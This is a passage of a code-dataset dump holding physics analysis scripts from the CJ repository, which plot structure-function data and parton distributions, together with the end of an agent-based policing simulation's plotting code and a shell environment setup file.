2, 3, 4, 5, 6]\n colors = [im.cmap(im.norm(value)) for value in values]\n patches = [mpatches.Patch(color=colors[i], label=\"Level {l}\".format(l=values[i])) for i in range(len(values))]\n plt.legend(handles=patches, bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n if show_plot:\n plt.show()\n # Plots the positions matrix\n if save:\n plt.savefig(name_to_save + '_time_iter_nr' + str(t) + '.png')\n # Saves the positions matrix\n # Compute now one time steps for each cop and each agent\n cops = [cop.time_step(agents) for cop in cops]\n agents = [ag.time_step(agents, cops) for ag in agents]\n D_list[t] = D\n arrested_list[t] = arrested\n type_1_arrested_list[t] = type_1_arrested\n type_0_arrested_list[t] = type_0_arrested\n active_list[t] = active\n type_1_active_list[t] = type_1_active\n type_0_active_list[t] = type_0_active\n\nif interactive:\n\n # Create figure\n fig = go.Figure()\n # Add 
traces, one for each slider step\n for step in np.arange(0, tfin, 1):\n curent_pd = pd.DataFrame(positions_data[step, :, :])\n fig.add_trace(go.Heatmap(\n z=curent_pd.applymap(str),\n colorscale=color_name_list)\n )\n # Make First trace visible\n fig.data[0].visible = True\n # Create and add slider\n steps = []\n\n for i in range(len(fig.data)):\n step = dict(\n method=\"update\",\n args=[{\"visible\": [False] * len(fig.data)},\n {\"title\": \"Slider switched to step: \" + str(i)}], # layout attribute\n )\n step[\"args\"][0][\"visible\"][i] = True # Toggle i'th trace to \"visible\"\n steps.append(step)\n\n sliders = [dict(\n active=10,\n currentvalue={\"prefix\": \"Time step: \"},\n pad={\"t\": 50},\n steps=steps\n )]\n\n fig.update_layout(sliders=sliders)\n fig.show()\n if save:\n fig.write_html(name_to_save+'.html')\n\nif save:\n lines = ['nation_dimension' + ': ' + str(nation_dimension),\n 'p_class_1' + ': ' + str(p_class_1),\n 'vision_agent' + ': ' + str(vision_agent),\n 'vision_cop' + ': ' + str(vision_cop),\n 'L' + ': ' + str(L),\n 'T' + ': ' + str(T),\n 'Jmax' + ': ' + str(Jmax),\n 'factor_Jmax1' + ': ' + str(factor_Jmax1),\n 'k' + ': ' + str(k),\n 'prob_arrest_class_1' + ': ' + str(prob_arrest_class_1),\n 'n_agents' + ': ' + str(n_agents),\n 'n_cops' + ': ' + str(n_cops),\n 'tfin' + ': ' + str(tfin)]\n\n with open(name_to_save + '_par.txt', 'w') as file:\n for line in lines:\n file.write(line + '\\n')\n file.close()\n # plot graphics for type0/1 active/arrested and D\n fig, ax = plt.subplots()\n ax.plot(time, D_list)\n ax.set(xlabel='time (epochs)', ylabel=\"agent's percieved D\", title='Discrimination factor')\n ax.grid()\n ax.legend(['D factor'])\n fig.savefig(name_to_save + 'Discrimination.png')\n\n fig, ax = plt.subplots()\n ax.plot(time, arrested_list, label='Total number of arrested agents')\n ax.plot(time, type_1_arrested_list, label='Total number of type 1 arrested agents')\n ax.plot(time, type_0_arrested_list, label='Total number of type 0 arrested agents')\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents\", title='Arrested agents')\n ax.grid()\n ax.legend(['total arrested','type 1 arrested', 'type 0 arrested'])\n fig.savefig(name_to_save + 'Arrests.png')\n\n fig, ax = plt.subplots()\n ax.plot(time, active_list, label='Total number of active agents')\n ax.plot(time, type_1_active_list, label='Total number of type 1 active agents')\n ax.plot(time, type_0_active_list, label='Total number of type 0 active agents')\n ax.set(xlabel='time (epochs)', ylabel=\"number of agents\", title='Active agents')\n ax.grid()\n ax.legend(['total active', 'type 1 active', 'type 0 active'])\n fig.savefig(name_to_save + 'Active.png')\n" } ]
3
Jeff182/CJ
https://github.com/Jeff182/CJ
dd8c2cc3f1a57b0c2f916b45968d0c573995b4ef
30fb4dba93c6812b7470e3f1ad767ad583c3a106
882232bc1c455edf89de3ad08bc65739c8f322ab
refs/heads/master
2020-04-10T16:54:30.236006
2015-09-15T01:00:11
2015-09-15T01:00:11
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48311156034469604, "alphanum_fraction": 0.5742067694664001, "avg_line_length": 27.735294342041016, "blob_id": "2b9931e67eeea564e0354b22b2050c61f4a0e1a8", "content_id": "5b8bde7b5caeb85407b9ed42e87f9c1848da815c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 65, "num_lines": 34, "path": "/sharespace/codes/off.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\n\nD={}\nD['AV18'] ={'p':[0.098,0.345,0.048] ,'c':'r','ls':'-'} \nD['CDBonn']={'p':[0.138,0.373,0.058] ,'c':'g','ls':'--'}\nD['WJC1'] ={'p':[0.132,-0.253,0.152],'c':'k','ls':'-.'}\nD['WJC2'] ={'p':[0.076,0.313,0.033] ,'c':'b','ls':':'}\n\nf=lambda x,p:p[0]*(x-p[1])*(x-p[2])*(1+p[1]-x)\nX=np.linspace(0,1,100)\nax=py.subplot(111)\nfor k in ['AV18','CDBonn','WJC1','WJC2']:\n ax.plot(X,f(X,D[k]['p']),\\\n color=D[k]['c'],\\\n lw=2.0,\\\n ls=D[k]['ls'],\\\n label=tex(k)\n )\nax.set_ylim(-0.025,0.04)\nax.set_ylabel(r'$\\delta f^N$',size=25)\nax.set_xlabel('$x$',size=25)\nax.legend(frameon=0,loc=2,fontsize=20)\npy.tick_params(axis='both',labelsize=20)\npy.tight_layout()\npy.savefig('gallery/off_shell.pdf')\n" }, { "alpha_fraction": 0.4637708365917206, "alphanum_fraction": 0.5368844866752625, "avg_line_length": 27.63538932800293, "blob_id": "9aca71019717a48522ce8b61d120034f88ecc6c9", "content_id": "99a15e9776ed74121865725c3f99f8f735cb4633", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "no_license", "max_line_length": 86, "num_lines": 373, "path": "/sharespace/codes/other/F2p.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport pandas as pd\nfrom tools import tex\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nimport matplotlib.patches as patches\nimport matplotlib.gridspec as gridspec\nimport lhapdf\n\nclass StructFunc(object):\n\n def __init__(self):\n self.path2exp='../../expdata/'\n self.D={}\n self.get_expdata_fnames()\n self.load_expdata()\n self.split_data()\n #self.get_errors()\n\n def get_expdata_fnames(self):\n D=self.D\n\n D['HERA p']={'fname':'HERA.dat', 'label':'HERA'}\n D['BCDMS p']={'fname':'BcdF2pCor', 'label':'BCDMS'}\n #D['BCDMS d']={'fname':'BcdF2dCor'}\n D['NMC p'] ={'fname':'NmcF2pCor', 'label':'NMC'}\n D['SLAC p'] ={'fname':'slac_p_reb', 'label':'SLAC'}\n #D['SLAC d'] ={'fname':'slac_d_reb'}\n D['JLab p'] ={'fname':'jl00106F2p', 'label':'JLab'}\n #D['JLab d'] ={'fname':'jl00106F2d'}\n ##D['BNS d'] ={'fname':'BNS_F2nd'}\n\n D['HERA p']['color']='g'\n D['BCDMS p']['color']='b'\n #D['BCDMS d']['color']='g'\n D['NMC p']['color'] ='c'\n D['SLAC p']['color'] ='y'\n #D['SLAC d']['color'] ='y'\n D['JLab p']['color'] ='r'\n #D['JLab d']['color'] ='k' \n ##D['BNS d']['color'] ='r' \n\n D['HERA p']['symbol']='*'\n D['BCDMS p']['symbol']='.'\n #D['BCDMS d']['symbol']='s'\n D['NMC p']['symbol'] ='*'\n D['SLAC p']['symbol'] ='>'\n #D['SLAC d']['symbol'] ='<'\n D['JLab p']['symbol'] ='^'\n #D['JLab d']['symbol'] ='v' \n ##D['BNS 
d']['symbol'] ='*' \n\n # errors\n D['HERA p']['ERR-key']=['STAT+SYST']\n D['BCDMS p']['ERR-key']=['STAERR','SYSERT']\n #D['BCDMS d']['ERR-key']=['STAERR','SYSERT']\n D['NMC p']['ERR-key']=['STAERR','SYSERT']\n D['SLAC p']['ERR-key']=['STAT.','SYS.']\n #D['SLAC d']['ERR-key']=['STAT','SYS']\n D['JLab p']['ERR-key']=['STAT','SYST']\n #D['JLab d']['ERR-key']=['STAT','SYST']\n\n keys=[]\n keys.append('HERA p')\n keys.append('BCDMS p')\n #keys.append('BCDMS d')\n keys.append('NMC p')\n keys.append('SLAC p')\n #keys.append('SLAC d')\n keys.append('JLab p')\n #keys.append('JLab d')\n self.ordered_keys=keys\n\n def load_expdata(self): \n D=self.D\n\n for k in D.keys():\n print 'loading ',k\n\n # open file\n F=open(self.path2exp+D[k]['fname'])\n L=F.readlines()\n F.close()\n L=[l.strip() for l in L]\n L=[l.split() for l in L if l!='']\n\n # construct table\n table=[]\n flag=False\n for i in range(len(L)): \n try:\n l=[float(x) for x in L[i]]\n if flag==False:\n ih=i-1\n flag=True\n except:\n continue\n table.append(l)\n table=np.transpose(table)\n\n # construct headers\n H=[x.upper() for x in L[ih]]\n for i in range(len(H)): H[i]=H[i].replace('Q**2','Q2')\n for i in range(len(H)): H[i]=H[i].replace('Q^2','Q2')\n for i in range(len(H)): H[i]=H[i].replace('F2P','F2')\n for i in range(len(H)): H[i]=H[i].replace('F2D','F2')\n for i in range(len(H)): H[i]=H[i].replace('F2D','F2')\n\n # construct pandas data frame\n d={}\n for i in range(len(H)):\n d[H[i]]=table[i]\n d['W2']=0.9389185**2 + d['Q2']/d['X'] - d['Q2']\n\n ERR=np.zeros(d['W2'].size)\n for kk in D[k]['ERR-key']:\n ERR+=d[kk]**2\n ERR=ERR**0.5\n d['ERR']=ERR\n\n DF=pd.DataFrame(d)\n #DF=DF[DF.W2>4.0]\n DF=DF[DF.Q2>1.0]\n\n # store DF in global dic\n D[k]['DF']=DF\n\n def get_xbins(self):\n xbins=[]\n\n\n xbins.append([3.8e-6,4.5e-6])\n xbins.append([4.9e-6,5.7e-6])\n xbins.append([6.3e-6,7.2e-6])\n xbins.append([7.9e-6,9.0e-6])\n xbins.append([9.5e-6,11.1e-6])\n xbins.append([12e-6,13.9e-6])\n xbins.append([15.2e-6,17.0e-6])\n xbins.append([19e-6,21e-6])\n xbins.append([31e-6,33e-6])\n xbins.append([38e-6,42e-6])\n xbins.append([48e-6,52e-6])\n xbins.append([58e-6,67e-6])\n xbins.append([77e-6,82e-6])\n xbins.append([96e-6,11e-5])\n xbins.append([12.5e-5,13.5e-5])\n xbins.append([19.5e-5,20.5e-5])\n xbins.append([24.5e-5,25.5e-5])\n xbins.append([30.5e-5,32.5e-5])\n xbins.append([47.5e-5,50.5e-5])\n xbins.append([78.5e-5,82.5e-5])\n xbins.append([12.5e-4,13.5e-4])\n xbins.append([19.5e-4,20.5e-4])\n\n xbins.append([3.1e-3,3.8e-3])\n xbins.append([4.8e-3,5.7e-3])\n xbins.append([7.2e-3,9.3e-3])\n xbins.append([1.15e-2,1.4e-2])\n xbins.append([1.65e-2,1.9e-2])\n xbins.append([1.95e-2,2.05e-2])\n xbins.append([2.3e-2,2.9e-2])\n xbins.append([3.15e-2,3.25e-2])\n xbins.append([3.4e-2,3.8e-2])\n xbins.append([4.65e-2,5.4e-2])\n xbins.append([6.5e-2,7.3e-2])\n xbins.append([7.8e-2,8.2e-2])\n xbins.append([8.5e-2,9.2e-2])\n xbins.append([9.8e-2,10.3e-2])\n xbins.append([10.8e-2,11.3e-2])\n xbins.append([12.8e-2,13.2e-2])\n xbins.append([13.6e-2,14.6e-2])\n xbins.append([17.1e-2,18.7e-2])\n xbins.append([19.7e-2,20.7e-2])\n xbins.append([21.7e-2,23.7e-2])\n xbins.append([24.8e-2,25.2e-2])\n xbins.append([26.0e-2,29.0e-2])\n xbins.append([33.0e-2,36.0e-2])\n xbins.append([39.5e-2,40.5e-2])\n xbins.append([42.0e-2,48.0e-2])\n\n #xbins.append([48.1e-2,49.4e-2])\n #xbins.append([49.4e-2,50.8e-2])\n #xbins.append([50.8e-2,51.8e-2])\n #xbins.append([51.8e-2,52.6e-2])\n #xbins.append([52.6e-2,53.4e-2])\n #xbins.append([53.4e-2,53.9e-2])\n 
#xbins.append([53.9e-2,54.5e-2])\n #xbins.append([54.5e-2,55.6e-2])\n #xbins.append([55.6e-2,56.6e-2])\n #xbins.append([56.6e-2,57.3e-2])\n #xbins.append([53.0e-2,56.0e-2])\n\n xbins.append([48.0e-2,63.0e-2])\n\n xbins.append([63.0e-2,66.0e-2])\n xbins.append([73.0e-2,76.0e-2])\n xbins.append([84.0e-2,86.0e-2])\n return xbins[::-1]\n\n def split_data(self):\n xbins=self.get_xbins()\n D=self.D\n for k in D.keys():\n d=D[k]['DF']\n dbinned={}\n for i in range(len(xbins)):\n xmin,xmax=xbins[i]\n dbinned[i]=d[d.X>xmin]\n dbinned[i]=dbinned[i][dbinned[i].X<xmax]\n D[k]['dbinned']=dbinned\n\n def make_XQ2_plot(self):\n D=self.D\n ax=py.subplot(111)\n for k in self.D.keys():\n d=D[k]['DF']\n if 'HERA' in k: color='k'\n else: color='r'\n ax.plot(d['X'],d['Q2'],color+'.',markersize=3)\n ax.semilogx()\n ax.semilogy()\n xbins=np.array(self.get_xbins()).flatten()\n ax.set_xticks(xbins)\n ax.set_xlim(1e-1,1e-0)\n ax.grid()\n py.savefig('XQ2.pdf')\n\n def add_subplot_axes(self,ax,rect,axisbg='w'):\n fig = py.gcf()\n box = ax.get_position()\n width = box.width\n height = box.height\n inax_position = ax.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3] # <= Typo was here\n subax = fig.add_axes([x,y,width,height],axisbg=axisbg)\n x_labelsize = subax.get_xticklabels()[0].get_size()\n y_labelsize = subax.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2]**0.5\n y_labelsize *= rect[3]**0.5\n subax.xaxis.set_tick_params(labelsize=x_labelsize)\n subax.yaxis.set_tick_params(labelsize=y_labelsize)\n return subax\n \n def make_F2_plot(self):\n D=self.D\n xbins=self.get_xbins()\n py.figure(figsize=(15,15))\n\n gs = gridspec.GridSpec(1,1)\n gs.update(left=0.1,right=0.98,top=0.98,bottom=0.1)\n ax=py.subplot(gs[0,0])\n\n for k in self.ordered_keys:\n dbinned=D[k]['dbinned']\n color=D[k]['color']\n sym=D[k]['symbol']\n flag=False\n for i in range(len(xbins)):\n dbin=dbinned[i]\n if dbin['X'].size!=0:\n if flag==False:\n ax.errorbar(dbin['Q2'],dbin['F2']*2**(i+1)\\\n ,yerr=dbin['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color\n ,label=tex(D[k]['label']))\n flag=True\n else:\n ax.errorbar(dbin['Q2'],dbin['F2']*2**(i+1)\\\n ,yerr=dbin['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n for i in range(len(xbins)):\n Q2=1\n for k in D.keys():\n dbin=D[k]['dbinned'][i]\n if dbin['X'].size==0:continue\n imax=np.argmax(dbin['Q2'].values)\n if dbin['Q2'].values[imax]>Q2: \n Q2=dbin['Q2'].values[imax]\n F2=dbin['F2'].values[imax]\n\n if any([i==k for k in [10,34,37,39,41,44,49,47,43,35,32,30,28,26,45,46]])!=True:\n\tif i>30:\n text='$x=%0.1e$'%(np.mean([xbins[i][0],xbins[i][1]]))\n\t exp=int(text.split('-')[1].replace('$',''))\n\t text=text.split('e')[0]+'e'\n text=text.replace('e',r'\\times 10^{-%d}'%exp)+'\\ (i=%d)$'%i\n\telif i<16:\n\t text='$x=%0.2f'%(np.mean([xbins[i][0],xbins[i][1]]))+'\\ (i=%d)$'%i\n\telse:\n\t text='$x=%0.3f'%(np.mean([xbins[i][0],xbins[i][1]]))+'\\ (i=%d)$'%i\n\n ax.text(Q2*1.2,F2*2**(i+1),text)\n #ax.text(Q2*1.2,F2*2**(i+1),text+str(i))\n\n ax.legend(frameon=0,fontsize=20,numpoints=1)\n\n ax.set_xlim(8e-5,3e5)\n ax.set_ylim(1e-3,2e13)\n ax.semilogy()\n ax.semilogx()\n ax.set_xticks([1e-1,1,1e1,1e2,1e3,1e4,1e5])\n #ax.set_ylabel(tex('F_2')+'$(x,Q^2)$',size=30)\n ax.set_ylabel('$F_2^p(x,Q^2)\\ * 2^{\\ i}$',size=30)\n ax.set_xlabel('$Q^2$'+tex('\\ (GeV^2)'),size=30)\n py.tick_params(axis='both',labelsize=20)\n\n xsq=0.45\n ysq=0.07\n 
ax.add_patch(patches.Rectangle((xsq,ysq),0.1,0.15\\\n ,fill=False,transform=ax.transAxes))\n ax.plot([0.36,xsq],[0.07,ysq],'k:'\n ,transform=ax.transAxes)\n ax.plot([0.36,xsq],[0.47,ysq+0.15],'k:'\n ,transform=ax.transAxes)\n\n\n rect1 = [0.06,0.07,0.3,0.3]\n ax1 = self.add_subplot_axes(ax,rect1)\n rect2 = [0.06,0.47,0.3,0.3]\n ax2 = self.add_subplot_axes(ax,rect2)\n\n for k in D.keys():\n if 'JLab' not in k: continue\n d=D[k]['DF']\n color=D[k]['color']\n sym=D[k]['symbol']\n\n ax1.errorbar(d['Q2'],d['F2']\\\n ,yerr=d['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n ax2.errorbar(d['X'],d['F2']\\\n ,yerr=d['ERR'].values\\\n ,fmt=color+sym\\\n ,mec=color)\n\n ax1.locator_params(nbins=5) \n ax2.locator_params(nbins=5) \n\n ax1.tick_params(axis='both',labelsize=12)\n ax2.tick_params(axis='both',labelsize=12)\n\n ax1.set_xlabel(r'$Q^2$'+tex('\\ (GeV^2)'),size=20)\n ax2.set_xlabel(r'$x$',size=20)\n ax1.set_ylim(1e-3,0.25)\n ax2.set_ylim(1e-3,0.25)\n ax1.semilogy()\n ax2.semilogy()\n #py.tight_layout()\n py.savefig('gallery/F2p.pdf')\n\nif __name__=='__main__':\n\n SF=StructFunc()\n #SF.make_XQ2_plot()\n SF.make_F2_plot()\n\n #CJ150=lhapdf.mkPDF('CJ15_NLO',0)\n #print CJ150.xfxQ2(2,0.5,100)\n\n" }, { "alpha_fraction": 0.590133547782898, "alphanum_fraction": 0.6413204669952393, "avg_line_length": 25.431371688842773, "blob_id": "604a152a966b9dc1b5948d078cf2610adbbe5776", "content_id": "44b4b3502edf86b755254bc7bbed8cdbd2f2819c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 82, "num_lines": 102, "path": "/sharespace/codes/xpdf.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Times-Roman']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK\n\n# prepare grid \ngs = gridspec.GridSpec(1,2) \ngs.update(left=0.11,right=0.98,wspace=0,hspace=0.0,top=0.98,bottom=0.1)\n\n# construct (L)eft panel\naxL=py.subplot(gs[0,0])\naxL.spines['right'].set_visible(False)\naxL.yaxis.set_ticks_position('left')\naxL.semilogx()\naxL.set_xticks(10**np.linspace(-4,-2,3))\n#axL.set_xlim(1e-5,0.1)\naxL.axvline(0.1,color='k',ls='--',alpha=0.5)\naxL.tick_params(axis='both', which='major', labelsize=20)\n\n# construct (R)ight panel\naxR=py.subplot(gs[0,1])\naxR.spines['left'].set_visible(False)\naxR.axes.yaxis.set_ticklabels([])\naxR.axes.get_yaxis().set_ticks([])\naxR.set_xticks(np.arange(0.1,1.1,0.2))\naxR.set_xlim(0.1,1.0)\naxR.tick_params(axis='both', which='major', labelsize=17)\n\nCJ=COMPOSER(name='CJ15_NLO_KP_AV18')\ndef plot(flav,color,factor=1):\n XL=10**np.linspace(-4,-1,100)\n XR=np.linspace(0.1,1,100)\n L=CJ.get_xpdf(flav,X=XL,Q2=Q2)\n R=CJ.get_xpdf(flav,X=XR,Q2=Q2)\n axL.plot(XL,L['xf0']*factor,color=color,ls='-')\n p1,=axR.plot(XR,R['xf0']*factor,color=color,ls='-',label=flav)\n fill_between(XL,\n factor*(L['xf0']-L['dxf-']*10),\n factor*(L['xf0']+L['dxf+']*10),\n ax=axL,\n facecolor=color,\n edgecolor='none',\n alpha=0.5)\n p2=fill_between(XR,\n factor*(R['xf0']-R['dxf-']*10),\n factor*(R['xf0']+R['dxf+']*10),\n ax=axR,\n facecolor=color,\n edgecolor='none',\n alpha=0.5)#,hatch=None)\n return 
(p2,p1)\n\nQ2=10\nLH={}\nLH['u']=plot('u','r')\nLH['d']=plot('d','b')\nLH['db+ub']=plot('db+ub','g')\nLH['db-ub']=plot('db-ub','m')\nLH['g']=plot('g','y',factor=1e-1)\n\n# set limits\nylimL = axL.get_ylim()\nylimR = axR.get_ylim()\nymin=-0.1#np.amin([ylimL[0],ylimL[1],ylimR[0],ylimR[1]])\nymax=1.6#np.amax([ylimL[0],ylimL[1],ylimR[0],ylimR[1]])\naxL.set_ylim(ymin,ymax)\naxR.set_ylim(ymin,ymax)\n\n# axis labels\naxL.set_ylabel('$xf(x,Q^2)$',size=25)\naxL.set_xlabel('$x$',size=25)\naxL.xaxis.set_label_coords(1.0,-0.04,transform=axL.transAxes)\n\n# legend\nlabelmap={}\nlabelmap['u']='$u$'\nlabelmap['d']='$d$'\nlabelmap['db+ub']=r'$\\bar{d}+\\bar{u}$'\nlabelmap['db-ub']=r'$\\bar{d}-\\bar{u}$'\nlabelmap['g']='$g/10$'\n\nH,L=[],[]\nfor k in ['u','d','db+ub','db-ub','g']:\n p12=LH[k]\n H.append(LH[k])\n L.append(labelmap[k])\naxR.legend(H,L,loc=1,frameon=0,fontsize=20)\n\n# info\naxL.text(0.1,0.1,'$Q^2=%0.0f$'%(Q2)+tex('~GeV^2'),transform=axL.transAxes,size=20)\n\n# the end\npy.savefig('gallery/xpdf.pdf')\n" }, { "alpha_fraction": 0.587598443031311, "alphanum_fraction": 0.6476377844810486, "avg_line_length": 25.736841201782227, "blob_id": "5565d85f55a986450140d3581cec6cff113988e8", "content_id": "f06e231415ef8a51a37509179aae43fd199b0267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1016, "license_type": "no_license", "max_line_length": 63, "num_lines": 38, "path": "/sharespace/codes/other/strange.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import COMPOSER,FITPACK,COMPOSER4NNPDF\n##################################################\n\n#NNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118')\nNNPDF=COMPOSER4NNPDF('NNPDF30_nlo_as_0118_nolhc_1000')\n\nMMHT14=COMPOSER('MMHT2014nlo68cl')\n\nax=py.subplot(111)\nQ2=1\n#X=np.linspace(1e-3,1,100)\nX=10**np.linspace(-3,0,100)\nD=NNPDF.get_xpdf('s',X=X,Q2=Q2)\nax.plot(X,D['xf0'],'r-',label='NNPDF')\nax.plot(X,D['xf0']-D['dxf-'],'r:')\nax.plot(X,D['xf0']+D['dxf+'],'r:')\n\nD=MMHT14.get_xpdf('s',X=X,Q2=Q2)\nax.plot(X,D['xf0'],'b-',label='MMHT')\nax.plot(X,D['xf0']-D['dxf-'],'b:')\nax.plot(X,D['xf0']+D['dxf+'],'b:')\n\nax.legend(frameon=0)\nax.semilogx()\nax.set_ylim(0,1)\npy.savefig('gallery/strange.pdf')\n" }, { "alpha_fraction": 0.6978417038917542, "alphanum_fraction": 0.730215847492218, "avg_line_length": 44.83333206176758, "blob_id": "bd186684790bc5b539339d65e62bf6e027d63e53", "content_id": "1b10b5080ae78c383441f7aa97f037e82f847ce1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 278, "license_type": "no_license", "max_line_length": 58, "num_lines": 6, "path": "/setup.sh", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "setenv LHAPDF_DATA_PATH /u/group/cteqX/apps/LHAPDF6\nsetenv PATH /site/bin:${PATH}\nsetenv PATH /apps/tmux/1.9a/bin:${PATH}\nsetenv PATH /apps/vim/vim-7.4/bin:${PATH}\nsetenv PATH /apps/python/python-2.7.7-anaconda/bin:${PATH}\nsetenv PATH /u/group/cteqX/apps/LHAPDF6/bin:${PATH}\n\n\n\n" }, { "alpha_fraction": 0.5214693546295166, "alphanum_fraction": 0.5795482993125916, "avg_line_length": 27.373239517211914, "blob_id": 
"26b3f3cd97a5346feaac9baf8aca9d73f8735955", "content_id": "3578adf6137c03f22405969c713c7cbdbef07c57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4029, "license_type": "no_license", "max_line_length": 78, "num_lines": 142, "path": "/sharespace/codes/other/CJ15.py", "repo_name": "Jeff182/CJ", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport sys,os\nsys.path.insert(1,'../../')\nimport numpy as np\nimport pylab as py\nimport tools\nfrom tools import tex,plot_band,fill_between\nimport lhapdf\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text',usetex=True)\nfrom master import FITPACK\n\n\n# initialize PDF instances\n# CJ12min=lhapdf.mkPDFs('CJ12min')\n\n# dictionary for PDG flav index\npdgmap= {'u':2,'d':1,'ub':-2,'db': -1,'s':3,'g':21}\n\n# load CJ15 from fitpack data \nCJ15 = {}\nCJ15['KP_AV18'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_AV18.pdf')\nCJ15['KP_CDBONN'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_CDBONN.pdf')\nCJ15['KP_WJC1'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_WJC1.pdf')\nCJ15['KP_WJC2'] = FITPACK().get_PDFs('data/CJ15_NLO_KP_WJC2.pdf')\n#CJ15['tst_AV18_KP'] = FITPACK().get_PDFs('data/tst_AV18_KP.pdf')\n#CJ15['tst_CDBONN_KP'] = FITPACK().get_PDFs('data/tst_CDBONN_KP.pdf')\n#CJ15['tst_WJC1_KP'] = FITPACK().get_PDFs('data/tst_WJC1_KP.pdf')\n#CJ15['tst_WJC2_KP'] = FITPACK().get_PDFs('data/tst_WJC2_KP.pdf')\n\n# dictionary for labels\nlabmap = {}\nlabmap['u'] = '$xu$'\nlabmap['d'] = '$xd$'\nlabmap['ub'] = r'$x\\bar{u}$'\nlabmap['db'] = r'$x\\bar{d}$'\nlabmap['s'] = '$xs$'\nlabmap['g'] = '$xg$'\nlabmap['du'] = '$d/u$'\nlabmap['dbub'] = r'$\\bar{d}/\\bar{u}$'\n\n# dictionary for grp == groups \ngrpmap = {}\ngrpmap['KP_AV18'] = {'color':'r-'}\ngrpmap['KP_CDBONN'] = {'color':'g-'}\ngrpmap['KP_WJC1'] = {'color':'b-'}\ngrpmap['KP_WJC2'] = {'color':'k:'}\n#grpmap['tst_AV18_KP'] = {'color':'r-'}\n#grpmap['tst_CDBONN_KP'] = {'color':'g-'}\n#grpmap['tst_WJC1_KP'] = {'color':'b-'}\n#grpmap['tst_WJC2_KP'] = {'color':'k:'}\n\n# dictionary for ylims \nymap = {}\nymap['u'] ={'min':0.0,'max':0.8}\nymap['d'] ={'min':0.0,'max':0.8}\nymap['du'] ={'min':0.0,'max':1.0}\nymap['dbub']={'min':0.6,'max':2.0}\nymap['ub']={'min':0.0,'max':0.6}\nymap['db']={'min':0.0,'max':0.6}\nymap['s'] ={'min':0.0,'max':0.6}\nymap['g'] ={'min':0.0,'max':10.0}\n\n# dictionary for plot location \ngs = gridspec.GridSpec(4,2) # specify plotting grid geometry\ngs.update(left=0.1,right=0.98,wspace=0.25,hspace=0.65,top=0.98,bottom=0.1)\ngrid = {}\ngrid['u'] = gs[0,0]\ngrid['d'] = gs[0,1]\ngrid['du'] = gs[1,0]\ngrid['dbub']= gs[1,1]\ngrid['ub']= gs[2,0]\ngrid['db']= gs[2,1]\ngrid['s'] = gs[3,0]\ngrid['g'] = gs[3,1]\n\n\n# setup kinematics\nQ2=10.0\niset=0\n\n\n# make plot\nfor flav in ['u','d','ub','db','s','g','du','dbub']:\n\n ax=py.subplot(grid[flav])\n\n for grp in ['KP_AV18','KP_CDBONN','KP_WJC1','KP_WJC2']:\n\n cj15 = CJ15[grp]\n X=cj15['Q2'][Q2]['x']\n if flav!='du' and flav!='dbub':\n central=cj15['Q2'][Q2]['x'+flav]\n error=cj15['Q2'][Q2]['err-x'+flav]*10\n elif flav=='du':\n central=cj15['Q2'][Q2]['d/u']\n error=cj15['Q2'][Q2]['err-d/u']*10\n elif flav=='dbub':\n central=cj15['Q2'][Q2]['db/ub']\n error=cj15['Q2'][Q2]['err-db/ub']*10\n\n if grp!='KP_AV18':\n ax.plot(X,central,grpmap[grp]['color'],label=tex(grp.replace('KP_','')))\n else:\n p1,=ax.plot(X,central,grpmap[grp]['color'])\n p2=fill_between(X,central-error,central+error,ax=ax,\n facecolor='#FFFF00',\n 
